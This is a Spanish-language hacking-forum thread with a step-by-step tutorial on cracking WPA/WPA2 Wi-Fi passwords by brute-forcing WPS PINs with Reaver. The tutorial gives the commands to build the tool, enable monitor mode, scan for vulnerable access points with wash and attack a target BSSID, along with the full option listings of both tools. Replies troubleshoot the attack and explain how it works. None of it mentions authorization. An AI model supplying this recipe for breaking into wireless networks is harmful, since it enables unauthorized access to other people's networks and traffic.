send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Crackeando WPA/WPA2 con Reaver

  • 8 Respuestas
  • 6349 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Agosto 26, 2014, 02:56:07 pm »

Descargamos Reaver desde acá: You are not allowed to view links. Register or Login

O desde la consola:

Código: Bash
  1. wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Luego lo descomprimimos:

Código: Bash
  1. tar -xvf reaver-1.4.tar.gz

Entramos en la carpeta cd reaver-1.4/src

Despues lo instalamos con

Código: Bash
  1. ./configure
  2. make
  3. make install

Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor

Código: Bash
  1. airmon-ng start wlan0


*Para buscar las redes vulnerables escribimos

Código: Bash
  1. wash -i mon0


sintaxis de wash:

Código: Text
  1. Wash v1.4 WiFi Protected Setup Scan Tool
  2. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  3.  
  4. Required Arguments:
  5.     -i, --interface=<iface>              Interface to capture packets on
  6.     -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files
  7.  
  8. Optional Arguments:
  9.     -c, --channel=<num>                  Channel to listen on [auto]
  10.     -o, --out-file=<file>                Write data to file
  11.     -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
  12.     -D, --daemonize                      Daemonize wash
  13.     -C, --ignore-fcs                     Ignore frame checksum errors
  14.     -5, --5ghz                           Use 5GHz 802.11 channels
  15.     -s, --scan                           Use scan mode
  16.     -u, --survey                         Use survey mode [default]
  17.     -h, --help                           Show help
  18.  
  19. Example:
  20.     wash -i mon0

*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal. Luego ejecutamos reaver

Ejemplo: Uso:

Código: Bash
  1. reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv

Sintaxis de Reaver

Código: Text
  1. Reaver v1.4 WiFi Protected Setup Attack Tool
  2. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  3.  
  4. Required Arguments:
  5.     -i, --interface=<wlan>          Name of the monitor-mode interface to use
  6.     -b, --bssid=<mac>               BSSID of the target AP
  7.  
  8. Optional Arguments:
  9.     -m, --mac=<mac>                 MAC of the host system
  10.     -e, --essid=<ssid>              ESSID of the target AP
  11.     -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
  12.     -o, --out-file=<file>           Send output to a log file [stdout]
  13.     -s, --session=<file>            Restore a previous session file
  14.     -C, --exec=<command>            Execute the supplied command upon successful pin recovery
  15.     -D, --daemonize                 Daemonize reaver
  16.     -a, --auto                      Auto detect the best advanced options for the target AP
  17.     -f, --fixed                     Disable channel hopping
  18.     -5, --5ghz                      Use 5GHz 802.11 channels
  19.     -v, --verbose                   Display non-critical warnings (-vv for more)
  20.     -q, --quiet                     Only display critical messages
  21.     -h, --help                      Show help
  22.  
  23. Advanced Options:
  24.     -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
  25.     -d, --delay=<seconds>           Set the delay between pin attempts [1]
  26.     -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
  27.     -g, --max-attempts=<num>        Quit after num pin attempts
  28.     -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
  29.     -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
  30.     -t, --timeout=<seconds>         Set the receive timeout period [5]
  31.     -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
  32.     -A, --no-associate              Do not associate with the AP (association must be done by another application)
  33.     -N, --no-nacks                  Do not send NACK messages when out of order packets are received
  34.     -S, --dh-small                  Use small DH keys to improve crack speed
  35.     -L, --ignore-locks              Ignore locked state reported by the target AP
  36.     -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
  37.     -n, --nack                      Target AP always sends a NACK [Auto]
  38.     -w, --win7                      Mimic a Windows 7 registrar [False]
  39.  
  40. Example:
  41.     reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas

Aqui les dejo algunos screenshoots :



Autor: briansx_404
« Última modificación: Abril 10, 2015, 09:48:16 pm por Cl0udswX »


Desconectado Codefont

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: rodrigoac94
« Respuesta #1 en: Agosto 27, 2014, 05:59:30 pm »
Exelente, clarito, buen aporte, Gracias ANTRAX

Conectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #2 en: Agosto 27, 2014, 07:33:43 pm »
Me va a venir bien este tutorial para la nueva antena..

Gracias Antrax,

Un saludo.



Desconectado Elsangui

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Diciembre 27, 2014, 04:45:19 pm »
Cuando ejecuto el Reaver solo me analiza con un mismo pin, y no va variando ni probando con otros. Cual puede ser el problema? Un saludo

Desconectado Cl0udswX

  • *
  • Moderator
  • Mensajes: 869
  • Actividad:
    5%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #4 en: Diciembre 27, 2014, 10:45:21 pm »
Podrías compartir tu forma de usarlo?

Saludos por allá hermano.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado Elsangui

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Diciembre 28, 2014, 01:17:47 pm »
La forma de usarlo es la misma que en este tutorial. El fallo viene en el ultimo paso, que solo lo prueba para un mismo pin. Uso el s.o kali linux.

Desconectado Cl0udswX

  • *
  • Moderator
  • Mensajes: 869
  • Actividad:
    5%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #6 en: Diciembre 29, 2014, 12:39:52 pm »
Lo primero es que cuando pregunto tu forma de usarlo esperaba una respuesta concreta, el hecho que escribas:

You are not allowed to view links. Register or Login
La forma de usarlo es la misma que en este tutorial.

No dice mucho, para ayudarte debes proporcionar suficiente información al respecto, tales como:

La forma en que lo instalaste
El tipo de tarjeta que tienes
La versión de Kali que tienes
La versión de reaver que estas usando.

Si me dices que lo haces igual que en el tutorial debería funcionarte igual que en el tutorial, por lo cual obviamente algo no esta del todo igual.

Saludos por allá hermano.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado Andreus

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
  • ¡Piensa siempre en voz alta!
    • Ver Perfil
  • Skype: AndreusCafe
« Respuesta #7 en: Abril 09, 2015, 03:16:04 am »
Muy pero muy buenas. Tengo un par de preguntas de quien recién comienza con el tema del crackeo en redes wireless y se encuentra con éste programa Reaver... y varias dificultades con los putos WPA/WPA2:

En términos básicos, ¿de qué forma ataca éste programa?

Tengo entendido que uno de los métodos más usados para el crackeo en redes WPA/WPA2 es el uso de diccionarios y la suerte. Método un poco jodido para quienes no disponemos de 1mb de velocidad de bajada y nos damos con diccionarios de 10gb que no sólo representan vaaarias horas de bajada sino que son un tiro al blanco con los ojos vendados, con una pistola de agua, agua sucia, a una diana a 10Km. No da...

Entonces... ¿Éste programa intenta atacar probando pines WPS? ¿También usa diccionarios?

Muchas gracias por la info y, si mis preguntas están mal formuladas, por favor comentarlo. De nuevo, muchas gracias...
Si nos imponemos limites, no seremos más.

Desconectado /d3v/nu11

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Abril 09, 2015, 09:11:17 am »
Si, reaver lo que hace es probar pins WPS y si en vez de usar reaver a secas usas algun script como gemini auditor este te automatiza todo el proceso buscando patrones conocidos y probando pins genéricos. En caso de no funcionar los pins genericos hace uso de la fuerza bruta para probar todos los posibles pins. Pero reaver no hace uso de diccionarios, o eso tengo entendido yo. No se si podras pasarle un diccionario de pins o algo asi.


Piensa por ti mismo y cuestiona a la autoridad.

 

¿Te gustó el post? COMPARTILO!



Crackear redes WPA/WPA2 con Diccionario ""Movistar""

Iniciado por Jack-C0de

Respuestas: 20
Vistas: 25525
Último mensaje Noviembre 28, 2016, 09:13:35 am
por willfap
Airolib-ng (El "Rapido" Crackeo de WPA/WPA2)

Iniciado por KzZiIi3l

Respuestas: 7
Vistas: 5089
Último mensaje Diciembre 07, 2011, 08:43:42 pm
por KzZiIi3l
Raspberry PI Cracking Station - Rainbow Tables para crackear WPA/WPA2 con Pyrit

Iniciado por Xc0d3's

Respuestas: 2
Vistas: 1408
Último mensaje Septiembre 16, 2017, 02:41:27 am
por Xc0d3's
Así funciona KRACK, la herramienta que permite hackear redes WiFi con WPA2

Iniciado por kpredator1093

Respuestas: 4
Vistas: 2348
Último mensaje Octubre 22, 2017, 08:09:30 pm
por kackerweno
Cracking de contraseñas WPA2 con Pyrit utilizando el CPU y la GPU - 30 000PMK/s

Iniciado por Xc0d3's

Respuestas: 0
Vistas: 950
Último mensaje Octubre 21, 2017, 09:54:40 pm
por Xc0d3's